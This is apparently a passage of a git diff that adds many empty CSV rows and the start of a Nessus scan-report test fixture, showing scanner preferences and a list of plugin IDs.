+,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, +,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, diff --git a/unittests/scans/nessus/nessus_many_vuln.xml b/unittests/scans/nessus/nessus_many_vuln.xml new file mode 100644 index 00000000000..3782bfdfae2 --- /dev/null +++ b/unittests/scans/nessus/nessus_many_vuln.xml @@ -0,0 +1,2769 @@ + + +Web App Tests +max_simult_tcp_sessions +unlimited + +use_mac_addr +no + +plugin_set +16775;16066;25451;54191;60374;55364;61980;33572;12878;24384;43101;40715;26256;27362;57439;66560;21828;64849;39419;32080;65025;64615;28457;55991;38878;40003;40295;16700;14933;66924;19111;15882;36867;63797;24446;34096;34617;23116;27863;56309;23189;32964;50088;53469;34145;32085;27877;18919;60594;62734;42311;19973;31892;36886;38403;55257;25995;52440;31436;17166;65244;19388;27965;15393;26515;28262;16773;62047;20539;35893;59532;15649;23796;58710;11594;45524;33408;39771;29306;14951;63816;58325;31734;38307;32903;56742;22288;56843;